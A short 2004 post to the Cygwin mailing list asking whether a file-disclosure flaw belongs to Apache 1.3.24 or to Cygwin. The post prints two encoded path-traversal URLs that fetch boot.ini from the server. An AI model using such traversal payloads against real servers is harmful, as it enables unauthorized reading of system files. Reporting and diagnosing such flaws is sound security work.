Apache 1.3.24 vulnerability?

배상우\(Bae, Sang-Woo\) swbae@stgsecurity.com
Tue Jan 13 08:44:00 GMT 2004


I've experienced below security problems on cygwin environment.

you can download any files on web server.
http://[server]/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini

is this a Apache 1.3.24 bug or a cygwin bug?


More information about the Cygwin mailing list